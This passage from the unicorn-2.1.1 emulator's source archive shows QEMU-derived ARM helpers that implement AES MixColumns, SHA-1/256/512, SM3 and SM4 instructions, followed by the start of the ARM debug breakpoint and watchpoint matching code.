0xaa6666cc, 0xa96767ce, 0xb86868d0, 0xbb6969d2, 0xbe6a6ad4, 0xbd6b6bd6, 0xb46c6cd8, 0xb76d6dda, 0xb26e6edc, 0xb16f6fde, 0x907070e0, 0x937171e2, 0x967272e4, 0x957373e6, 0x9c7474e8, 0x9f7575ea, 0x9a7676ec, 0x997777ee, 0x887878f0, 0x8b7979f2, 0x8e7a7af4, 0x8d7b7bf6, 0x847c7cf8, 0x877d7dfa, 0x827e7efc, 0x817f7ffe, 0x9b80801b, 0x98818119, 0x9d82821f, 0x9e83831d, 0x97848413, 0x94858511, 0x91868617, 0x92878715, 0x8388880b, 0x80898909, 0x858a8a0f, 0x868b8b0d, 0x8f8c8c03, 0x8c8d8d01, 0x898e8e07, 0x8a8f8f05, 0xab90903b, 0xa8919139, 0xad92923f, 0xae93933d, 0xa7949433, 0xa4959531, 0xa1969637, 0xa2979735, 0xb398982b, 0xb0999929, 0xb59a9a2f, 0xb69b9b2d, 0xbf9c9c23, 0xbc9d9d21, 0xb99e9e27, 0xba9f9f25, 0xfba0a05b, 0xf8a1a159, 0xfda2a25f, 0xfea3a35d, 0xf7a4a453, 0xf4a5a551, 0xf1a6a657, 0xf2a7a755, 0xe3a8a84b, 0xe0a9a949, 0xe5aaaa4f, 0xe6abab4d, 0xefacac43, 0xecadad41, 0xe9aeae47, 0xeaafaf45, 0xcbb0b07b, 0xc8b1b179, 0xcdb2b27f, 0xceb3b37d, 0xc7b4b473, 0xc4b5b571, 0xc1b6b677, 0xc2b7b775, 0xd3b8b86b, 0xd0b9b969, 0xd5baba6f, 0xd6bbbb6d, 0xdfbcbc63, 0xdcbdbd61, 0xd9bebe67, 0xdabfbf65, 0x5bc0c09b, 0x58c1c199, 0x5dc2c29f, 0x5ec3c39d, 0x57c4c493, 0x54c5c591, 0x51c6c697, 0x52c7c795, 0x43c8c88b, 0x40c9c989, 0x45caca8f, 0x46cbcb8d, 0x4fcccc83, 0x4ccdcd81, 0x49cece87, 0x4acfcf85, 0x6bd0d0bb, 0x68d1d1b9, 0x6dd2d2bf, 0x6ed3d3bd, 0x67d4d4b3, 0x64d5d5b1, 0x61d6d6b7, 0x62d7d7b5, 0x73d8d8ab, 0x70d9d9a9, 0x75dadaaf, 0x76dbdbad, 0x7fdcdca3, 0x7cdddda1, 0x79dedea7, 0x7adfdfa5, 0x3be0e0db, 0x38e1e1d9, 0x3de2e2df, 0x3ee3e3dd, 0x37e4e4d3, 0x34e5e5d1, 0x31e6e6d7, 0x32e7e7d5, 0x23e8e8cb, 0x20e9e9c9, 0x25eaeacf, 0x26ebebcd, 0x2fececc3, 0x2cededc1, 0x29eeeec7, 0x2aefefc5, 0x0bf0f0fb, 0x08f1f1f9, 0x0df2f2ff, 0x0ef3f3fd, 0x07f4f4f3, 0x04f5f5f1, 0x01f6f6f7, 0x02f7f7f5, 0x13f8f8eb, 0x10f9f9e9, 0x15fafaef, 0x16fbfbed, 0x1ffcfce3, 0x1cfdfde1, 0x19fefee7, 0x1affffe5, }, { /* Inverse MixColumns lookup table */ 0x00000000, 0x0b0d090e, 0x161a121c, 0x1d171b12, 0x2c342438, 0x27392d36, 0x3a2e3624, 0x31233f2a, 0x58684870, 0x5365417e, 0x4e725a6c, 0x457f5362, 0x745c6c48, 0x7f516546, 0x62467e54, 0x694b775a, 0xb0d090e0, 0xbbdd99ee, 0xa6ca82fc, 0xadc78bf2, 0x9ce4b4d8, 0x97e9bdd6, 0x8afea6c4, 0x81f3afca, 0xe8b8d890, 0xe3b5d19e, 0xfea2ca8c, 0xf5afc382, 0xc48cfca8, 0xcf81f5a6, 0xd296eeb4, 0xd99be7ba, 0x7bbb3bdb, 0x70b632d5, 0x6da129c7, 0x66ac20c9, 0x578f1fe3, 0x5c8216ed, 0x41950dff, 0x4a9804f1, 0x23d373ab, 0x28de7aa5, 0x35c961b7, 0x3ec468b9, 0x0fe75793, 0x04ea5e9d, 0x19fd458f, 0x12f04c81, 0xcb6bab3b, 0xc066a235, 0xdd71b927, 0xd67cb029, 0xe75f8f03, 0xec52860d, 0xf1459d1f, 0xfa489411, 0x9303e34b, 0x980eea45, 0x8519f157, 0x8e14f859, 0xbf37c773, 0xb43ace7d, 0xa92dd56f, 0xa220dc61, 0xf66d76ad, 0xfd607fa3, 0xe07764b1, 0xeb7a6dbf, 0xda595295, 0xd1545b9b, 0xcc434089, 0xc74e4987, 0xae053edd, 0xa50837d3, 0xb81f2cc1, 0xb31225cf, 0x82311ae5, 0x893c13eb, 0x942b08f9, 0x9f2601f7, 0x46bde64d, 0x4db0ef43, 0x50a7f451, 0x5baafd5f, 0x6a89c275, 0x6184cb7b, 0x7c93d069, 0x779ed967, 0x1ed5ae3d, 0x15d8a733, 0x08cfbc21, 0x03c2b52f, 0x32e18a05, 0x39ec830b, 0x24fb9819, 0x2ff69117, 0x8dd64d76, 0x86db4478, 0x9bcc5f6a, 0x90c15664, 0xa1e2694e, 0xaaef6040, 0xb7f87b52, 0xbcf5725c, 0xd5be0506, 0xdeb30c08, 0xc3a4171a, 0xc8a91e14, 0xf98a213e, 0xf2872830, 0xef903322, 0xe49d3a2c, 0x3d06dd96, 0x360bd498, 0x2b1ccf8a, 0x2011c684, 0x1132f9ae, 0x1a3ff0a0, 0x0728ebb2, 0x0c25e2bc, 0x656e95e6, 0x6e639ce8, 0x737487fa, 0x78798ef4, 0x495ab1de, 0x4257b8d0, 0x5f40a3c2, 0x544daacc, 0xf7daec41, 0xfcd7e54f, 0xe1c0fe5d, 0xeacdf753, 0xdbeec879, 0xd0e3c177, 0xcdf4da65, 0xc6f9d36b, 0xafb2a431, 0xa4bfad3f, 0xb9a8b62d, 0xb2a5bf23, 0x83868009, 0x888b8907, 0x959c9215, 0x9e919b1b, 0x470a7ca1, 0x4c0775af, 0x51106ebd, 0x5a1d67b3, 0x6b3e5899, 0x60335197, 0x7d244a85, 0x7629438b, 0x1f6234d1, 0x146f3ddf, 0x097826cd, 0x02752fc3, 0x335610e9, 0x385b19e7, 0x254c02f5, 0x2e410bfb, 0x8c61d79a, 0x876cde94, 0x9a7bc586, 0x9176cc88, 0xa055f3a2, 0xab58faac, 0xb64fe1be, 0xbd42e8b0, 0xd4099fea, 0xdf0496e4, 0xc2138df6, 0xc91e84f8, 0xf83dbbd2, 0xf330b2dc, 0xee27a9ce, 0xe52aa0c0, 0x3cb1477a, 0x37bc4e74, 0x2aab5566, 0x21a65c68, 0x10856342, 0x1b886a4c, 0x069f715e, 0x0d927850, 0x64d90f0a, 0x6fd40604, 0x72c31d16, 0x79ce1418, 0x48ed2b32, 0x43e0223c, 0x5ef7392e, 0x55fa3020, 0x01b79aec, 0x0aba93e2, 0x17ad88f0, 0x1ca081fe, 0x2d83bed4, 0x268eb7da, 0x3b99acc8, 0x3094a5c6, 0x59dfd29c, 0x52d2db92, 0x4fc5c080, 0x44c8c98e, 0x75ebf6a4, 0x7ee6ffaa, 0x63f1e4b8, 0x68fcedb6, 0xb1670a0c, 0xba6a0302, 0xa77d1810, 0xac70111e, 0x9d532e34, 0x965e273a, 0x8b493c28, 0x80443526, 0xe90f427c, 0xe2024b72, 0xff155060, 0xf418596e, 0xc53b6644, 0xce366f4a, 0xd3217458, 0xd82c7d56, 0x7a0ca137, 0x7101a839, 0x6c16b32b, 0x671bba25, 0x5638850f, 0x5d358c01, 0x40229713, 0x4b2f9e1d, 0x2264e947, 0x2969e049, 0x347efb5b, 0x3f73f255, 0x0e50cd7f, 0x055dc471, 0x184adf63, 0x1347d66d, 0xcadc31d7, 0xc1d138d9, 0xdcc623cb, 0xd7cb2ac5, 0xe6e815ef, 0xede51ce1, 0xf0f207f3, 0xfbff0efd, 0x92b479a7, 0x99b970a9, 0x84ae6bbb, 0x8fa362b5, 0xbe805d9f, 0xb58d5491, 0xa89a4f83, 0xa397468d, } }; uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE st = { .l = { rm[0], rm[1] } }; int i; assert(decrypt < 2); for (i = 0; i < 16; i += 4) { CR_ST_WORD(st, i >> 2) = mc[decrypt][CR_ST_BYTE(st, i)] ^ rol32(mc[decrypt][CR_ST_BYTE(st, i + 1)], 8) ^ rol32(mc[decrypt][CR_ST_BYTE(st, i + 2)], 16) ^ rol32(mc[decrypt][CR_ST_BYTE(st, i + 3)], 24); } rd[0] = st.l[0]; rd[1] = st.l[1]; } /* * SHA-1 logical functions */ static uint32_t cho(uint32_t x, uint32_t y, uint32_t z) { return (x & (y ^ z)) ^ z; } static uint32_t par(uint32_t x, uint32_t y, uint32_t z) { return x ^ y ^ z; } static uint32_t maj(uint32_t x, uint32_t y, uint32_t z) { return (x & y) | ((x | y) & z); } void HELPER(crypto_sha1_3reg)(void *vd, void *vn, void *vm, uint32_t op) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; if (op == 3) { /* sha1su0 */ d.l[0] ^= d.l[1] ^ m.l[0]; d.l[1] ^= n.l[0] ^ m.l[1]; } else { int i; for (i = 0; i < 4; i++) { uint32_t t = 0; switch (op) { case 0: /* sha1c */ t = cho(CR_ST_WORD(d, 1), CR_ST_WORD(d, 2), CR_ST_WORD(d, 3)); break; case 1: /* sha1p */ t = par(CR_ST_WORD(d, 1), CR_ST_WORD(d, 2), CR_ST_WORD(d, 3)); break; case 2: /* sha1m */ t = maj(CR_ST_WORD(d, 1), CR_ST_WORD(d, 2), CR_ST_WORD(d, 3)); break; default: g_assert_not_reached(); } t += rol32(CR_ST_WORD(d, 0), 5) + CR_ST_WORD(n, 0) + CR_ST_WORD(m, i); CR_ST_WORD(n, 0) = CR_ST_WORD(d, 3); CR_ST_WORD(d, 3) = CR_ST_WORD(d, 2); CR_ST_WORD(d, 2) = ror32(CR_ST_WORD(d, 1), 2); CR_ST_WORD(d, 1) = CR_ST_WORD(d, 0); CR_ST_WORD(d, 0) = t; } } rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sha1h)(void *vd, void *vm) { uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; CR_ST_WORD(m, 0) = ror32(CR_ST_WORD(m, 0), 2); CR_ST_WORD(m, 1) = CR_ST_WORD(m, 2) = CR_ST_WORD(m, 3) = 0; rd[0] = m.l[0]; rd[1] = m.l[1]; } void HELPER(crypto_sha1su1)(void *vd, void *vm) { uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; CR_ST_WORD(d, 0) = rol32(CR_ST_WORD(d, 0) ^ CR_ST_WORD(m, 1), 1); CR_ST_WORD(d, 1) = rol32(CR_ST_WORD(d, 1) ^ CR_ST_WORD(m, 2), 1); CR_ST_WORD(d, 2) = rol32(CR_ST_WORD(d, 2) ^ CR_ST_WORD(m, 3), 1); CR_ST_WORD(d, 3) = rol32(CR_ST_WORD(d, 3) ^ CR_ST_WORD(d, 0), 1); rd[0] = d.l[0]; rd[1] = d.l[1]; } /* * The SHA-256 logical functions, according to * http://csrc.nist.gov/groups/STM/cavp/documents/shs/sha256-384-512.pdf */ static uint32_t S0(uint32_t x) { return ror32(x, 2) ^ ror32(x, 13) ^ ror32(x, 22); } static uint32_t S1(uint32_t x) { return ror32(x, 6) ^ ror32(x, 11) ^ ror32(x, 25); } static uint32_t s0(uint32_t x) { return ror32(x, 7) ^ ror32(x, 18) ^ (x >> 3); } static uint32_t s1(uint32_t x) { return ror32(x, 17) ^ ror32(x, 19) ^ (x >> 10); } void HELPER(crypto_sha256h)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; int i; for (i = 0; i < 4; i++) { uint32_t t = cho(CR_ST_WORD(n, 0), CR_ST_WORD(n, 1), CR_ST_WORD(n, 2)) + CR_ST_WORD(n, 3) + S1(CR_ST_WORD(n, 0)) + CR_ST_WORD(m, i); CR_ST_WORD(n, 3) = CR_ST_WORD(n, 2); CR_ST_WORD(n, 2) = CR_ST_WORD(n, 1); CR_ST_WORD(n, 1) = CR_ST_WORD(n, 0); CR_ST_WORD(n, 0) = CR_ST_WORD(d, 3) + t; t += maj(CR_ST_WORD(d, 0), CR_ST_WORD(d, 1), CR_ST_WORD(d, 2)) + S0(CR_ST_WORD(d, 0)); CR_ST_WORD(d, 3) = CR_ST_WORD(d, 2); CR_ST_WORD(d, 2) = CR_ST_WORD(d, 1); CR_ST_WORD(d, 1) = CR_ST_WORD(d, 0); CR_ST_WORD(d, 0) = t; } rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sha256h2)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; int i; for (i = 0; i < 4; i++) { uint32_t t = cho(CR_ST_WORD(d, 0), CR_ST_WORD(d, 1), CR_ST_WORD(d, 2)) + CR_ST_WORD(d, 3) + S1(CR_ST_WORD(d, 0)) + CR_ST_WORD(m, i); CR_ST_WORD(d, 3) = CR_ST_WORD(d, 2); CR_ST_WORD(d, 2) = CR_ST_WORD(d, 1); CR_ST_WORD(d, 1) = CR_ST_WORD(d, 0); CR_ST_WORD(d, 0) = CR_ST_WORD(n, 3 - i) + t; } rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sha256su0)(void *vd, void *vm) { uint64_t *rd = vd; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; CR_ST_WORD(d, 0) += s0(CR_ST_WORD(d, 1)); CR_ST_WORD(d, 1) += s0(CR_ST_WORD(d, 2)); CR_ST_WORD(d, 2) += s0(CR_ST_WORD(d, 3)); CR_ST_WORD(d, 3) += s0(CR_ST_WORD(m, 0)); rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sha256su1)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; CR_ST_WORD(d, 0) += s1(CR_ST_WORD(m, 2)) + CR_ST_WORD(n, 1); CR_ST_WORD(d, 1) += s1(CR_ST_WORD(m, 3)) + CR_ST_WORD(n, 2); CR_ST_WORD(d, 2) += s1(CR_ST_WORD(d, 0)) + CR_ST_WORD(n, 3); CR_ST_WORD(d, 3) += s1(CR_ST_WORD(d, 1)) + CR_ST_WORD(m, 0); rd[0] = d.l[0]; rd[1] = d.l[1]; } /* * The SHA-512 logical functions (same as above but using 64-bit operands) */ static uint64_t cho512(uint64_t x, uint64_t y, uint64_t z) { return (x & (y ^ z)) ^ z; } static uint64_t maj512(uint64_t x, uint64_t y, uint64_t z) { return (x & y) | ((x | y) & z); } static uint64_t S0_512(uint64_t x) { return ror64(x, 28) ^ ror64(x, 34) ^ ror64(x, 39); } static uint64_t S1_512(uint64_t x) { return ror64(x, 14) ^ ror64(x, 18) ^ ror64(x, 41); } static uint64_t s0_512(uint64_t x) { return ror64(x, 1) ^ ror64(x, 8) ^ (x >> 7); } static uint64_t s1_512(uint64_t x) { return ror64(x, 19) ^ ror64(x, 61) ^ (x >> 6); } void HELPER(crypto_sha512h)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; uint64_t d0 = rd[0]; uint64_t d1 = rd[1]; d1 += S1_512(rm[1]) + cho512(rm[1], rn[0], rn[1]); d0 += S1_512(d1 + rm[0]) + cho512(d1 + rm[0], rm[1], rn[0]); rd[0] = d0; rd[1] = d1; } void HELPER(crypto_sha512h2)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; uint64_t d0 = rd[0]; uint64_t d1 = rd[1]; d1 += S0_512(rm[0]) + maj512(rn[0], rm[1], rm[0]); d0 += S0_512(d1) + maj512(d1, rm[0], rm[1]); rd[0] = d0; rd[1] = d1; } void HELPER(crypto_sha512su0)(void *vd, void *vn) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t d0 = rd[0]; uint64_t d1 = rd[1]; d0 += s0_512(rd[1]); d1 += s0_512(rn[0]); rd[0] = d0; rd[1] = d1; } void HELPER(crypto_sha512su1)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; rd[0] += s1_512(rn[0]) + rm[0]; rd[1] += s1_512(rn[1]) + rm[1]; } void HELPER(crypto_sm3partw1)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; uint32_t t; t = CR_ST_WORD(d, 0) ^ CR_ST_WORD(n, 0) ^ ror32(CR_ST_WORD(m, 1), 17); CR_ST_WORD(d, 0) = t ^ ror32(t, 17) ^ ror32(t, 9); t = CR_ST_WORD(d, 1) ^ CR_ST_WORD(n, 1) ^ ror32(CR_ST_WORD(m, 2), 17); CR_ST_WORD(d, 1) = t ^ ror32(t, 17) ^ ror32(t, 9); t = CR_ST_WORD(d, 2) ^ CR_ST_WORD(n, 2) ^ ror32(CR_ST_WORD(m, 3), 17); CR_ST_WORD(d, 2) = t ^ ror32(t, 17) ^ ror32(t, 9); t = CR_ST_WORD(d, 3) ^ CR_ST_WORD(n, 3) ^ ror32(CR_ST_WORD(d, 0), 17); CR_ST_WORD(d, 3) = t ^ ror32(t, 17) ^ ror32(t, 9); rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sm3partw2)(void *vd, void *vn, void *vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; uint32_t t = CR_ST_WORD(n, 0) ^ ror32(CR_ST_WORD(m, 0), 25); CR_ST_WORD(d, 0) ^= t; CR_ST_WORD(d, 1) ^= CR_ST_WORD(n, 1) ^ ror32(CR_ST_WORD(m, 1), 25); CR_ST_WORD(d, 2) ^= CR_ST_WORD(n, 2) ^ ror32(CR_ST_WORD(m, 2), 25); CR_ST_WORD(d, 3) ^= CR_ST_WORD(n, 3) ^ ror32(CR_ST_WORD(m, 3), 25) ^ ror32(t, 17) ^ ror32(t, 2) ^ ror32(t, 26); rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sm3tt)(void *vd, void *vn, void *vm, uint32_t imm2, uint32_t opcode) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; uint32_t t = 0; assert(imm2 < 4); if (opcode == 0 || opcode == 2) { /* SM3TT1A, SM3TT2A */ t = par(CR_ST_WORD(d, 3), CR_ST_WORD(d, 2), CR_ST_WORD(d, 1)); } else if (opcode == 1) { /* SM3TT1B */ t = maj(CR_ST_WORD(d, 3), CR_ST_WORD(d, 2), CR_ST_WORD(d, 1)); } else if (opcode == 3) { /* SM3TT2B */ t = cho(CR_ST_WORD(d, 3), CR_ST_WORD(d, 2), CR_ST_WORD(d, 1)); } else { g_assert_not_reached(); } t += CR_ST_WORD(d, 0) + CR_ST_WORD(m, imm2); CR_ST_WORD(d, 0) = CR_ST_WORD(d, 1); if (opcode < 2) { /* SM3TT1A, SM3TT1B */ t += CR_ST_WORD(n, 3) ^ ror32(CR_ST_WORD(d, 3), 20); CR_ST_WORD(d, 1) = ror32(CR_ST_WORD(d, 2), 23); } else { /* SM3TT2A, SM3TT2B */ t += CR_ST_WORD(n, 3); t ^= rol32(t, 9) ^ rol32(t, 17); CR_ST_WORD(d, 1) = ror32(CR_ST_WORD(d, 2), 13); } CR_ST_WORD(d, 2) = CR_ST_WORD(d, 3); CR_ST_WORD(d, 3) = t; rd[0] = d.l[0]; rd[1] = d.l[1]; } static uint8_t const sm4_sbox[] = { 0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05, 0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99, 0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62, 0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6, 0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8, 0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35, 0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87, 0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e, 0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1, 0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3, 0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f, 0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51, 0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8, 0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0, 0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84, 0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48, }; void HELPER(crypto_sm4e)(void *vd, void *vn) { uint64_t *rd = vd; uint64_t *rn = vn; union CRYPTO_STATE d = { .l = { rd[0], rd[1] } }; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; uint32_t t, i; for (i = 0; i < 4; i++) { t = CR_ST_WORD(d, (i + 1) % 4) ^ CR_ST_WORD(d, (i + 2) % 4) ^ CR_ST_WORD(d, (i + 3) % 4) ^ CR_ST_WORD(n, i); t = sm4_sbox[t & 0xff] | sm4_sbox[(t >> 8) & 0xff] << 8 | sm4_sbox[(t >> 16) & 0xff] << 16 | sm4_sbox[(t >> 24) & 0xff] << 24; CR_ST_WORD(d, i) ^= t ^ rol32(t, 2) ^ rol32(t, 10) ^ rol32(t, 18) ^ rol32(t, 24); } rd[0] = d.l[0]; rd[1] = d.l[1]; } void HELPER(crypto_sm4ekey)(void *vd, void *vn, void* vm) { uint64_t *rd = vd; uint64_t *rn = vn; uint64_t *rm = vm; union CRYPTO_STATE d; union CRYPTO_STATE n = { .l = { rn[0], rn[1] } }; union CRYPTO_STATE m = { .l = { rm[0], rm[1] } }; uint32_t t, i; d = n; for (i = 0; i < 4; i++) { t = CR_ST_WORD(d, (i + 1) % 4) ^ CR_ST_WORD(d, (i + 2) % 4) ^ CR_ST_WORD(d, (i + 3) % 4) ^ CR_ST_WORD(m, i); t = sm4_sbox[t & 0xff] | sm4_sbox[(t >> 8) & 0xff] << 8 | sm4_sbox[(t >> 16) & 0xff] << 16 | sm4_sbox[(t >> 24) & 0xff] << 24; CR_ST_WORD(d, i) ^= t ^ rol32(t, 13) ^ rol32(t, 23); } rd[0] = d.l[0]; rd[1] = d.l[1]; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/debug_helper.c��������������������������������������������������������0000664�0000000�0000000�00000022653�14675241067�0021021�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM debug helpers. * * This code is licensed under the GNU GPL v2 or later. * * SPDX-License-Identifier: GPL-2.0-or-later */ #include "qemu/osdep.h" #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" /* Return true if the linked breakpoint entry lbn passes its checks */ static bool linked_bp_matches(ARMCPU *cpu, int lbn) { CPUARMState *env = &cpu->env; uint64_t bcr = env->cp15.dbgbcr[lbn]; int brps = arm_num_brps(cpu); int ctx_cmps = arm_num_ctx_cmps(cpu); int bt; uint32_t contextidr; uint64_t hcr_el2; /* * Links to unimplemented or non-context aware breakpoints are * CONSTRAINED UNPREDICTABLE: either behave as if disabled, or * as if linked to an UNKNOWN context-aware breakpoint (in which * case DBGWCR<n>_EL1.LBN must indicate that breakpoint). * We choose the former. */ if (lbn >= brps || lbn < (brps - ctx_cmps)) { return false; } bcr = env->cp15.dbgbcr[lbn]; if (extract64(bcr, 0, 1) == 0) { /* Linked breakpoint disabled : generate no events */ return false; } bt = extract64(bcr, 20, 4); hcr_el2 = arm_hcr_el2_eff(env); switch (bt) { case 3: /* linked context ID match */ switch (arm_current_el(env)) { default: /* Context matches never fire in AArch64 EL3 */ return false; case 2: if (!(hcr_el2 & HCR_E2H)) { /* Context matches never fire in EL2 without E2H enabled. */ return false; } contextidr = env->cp15.contextidr_el[2]; break; case 1: contextidr = env->cp15.contextidr_el[1]; break; case 0: if ((hcr_el2 & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE)) { contextidr = env->cp15.contextidr_el[2]; } else { contextidr = env->cp15.contextidr_el[1]; } break; } break; case 7: /* linked contextidr_el1 match */ contextidr = env->cp15.contextidr_el[1]; break; case 13: /* linked contextidr_el2 match */ contextidr = env->cp15.contextidr_el[2]; break; case 9: /* linked VMID match (reserved if no EL2) */ case 11: /* linked context ID and VMID match (reserved if no EL2) */ case 15: /* linked full context ID match */ default: /* * Links to Unlinked context breakpoints must generate no * events; we choose to do the same for reserved values too. */ return false; } /* * We match the whole register even if this is AArch32 using the * short descriptor format (in which case it holds both PROCID and ASID), * since we don't implement the optional v7 context ID masking. */ return contextidr == (uint32_t)env->cp15.dbgbvr[lbn]; } static bool bp_wp_matches(ARMCPU *cpu, int n, bool is_wp) { CPUARMState *env = &cpu->env; uint64_t cr; int pac, hmc, ssc, wt, lbn; /* * Note that for watchpoints the check is against the CPU security * state, not the S/NS attribute on the offending data access. */ bool is_secure = arm_is_secure(env); int access_el = arm_current_el(env); if (is_wp) { CPUWatchpoint *wp = env->cpu_watchpoint[n]; if (!wp || !(wp->flags & BP_WATCHPOINT_HIT)) { return false; } cr = env->cp15.dbgwcr[n]; if (wp->hitattrs.user) { /* * The LDRT/STRT/LDT/STT "unprivileged access" instructions should * match watchpoints as if they were accesses done at EL0, even if * the CPU is at EL1 or higher. */ access_el = 0; } } else { uint64_t pc = is_a64(env) ? env->pc : env->regs[15]; if (!env->cpu_breakpoint[n] || env->cpu_breakpoint[n]->pc != pc) { return false; } cr = env->cp15.dbgbcr[n]; } /* * The WATCHPOINT_HIT flag guarantees us that the watchpoint is * enabled and that the address and access type match; for breakpoints * we know the address matched; check the remaining fields, including * linked breakpoints. We rely on WCR and BCR having the same layout * for the LBN, SSC, HMC, PAC/PMC and is-linked fields. * Note that some combinations of {PAC, HMC, SSC} are reserved and * must act either like some valid combination or as if the watchpoint * were disabled. We choose the former, and use this together with * the fact that EL3 must always be Secure and EL2 must always be * Non-Secure to simplify the code slightly compared to the full * table in the ARM ARM. */ pac = extract64(cr, 1, 2); hmc = extract64(cr, 13, 1); ssc = extract64(cr, 14, 2); switch (ssc) { case 0: break; case 1: case 3: if (is_secure) { return false; } break; case 2: if (!is_secure) { return false; } break; } switch (access_el) { case 3: case 2: if (!hmc) { return false; } break; case 1: if (extract32(pac, 0, 1) == 0) { return false; } break; case 0: if (extract32(pac, 1, 1) == 0) { return false; } break; default: g_assert_not_reached(); } wt = extract64(cr, 20, 1); 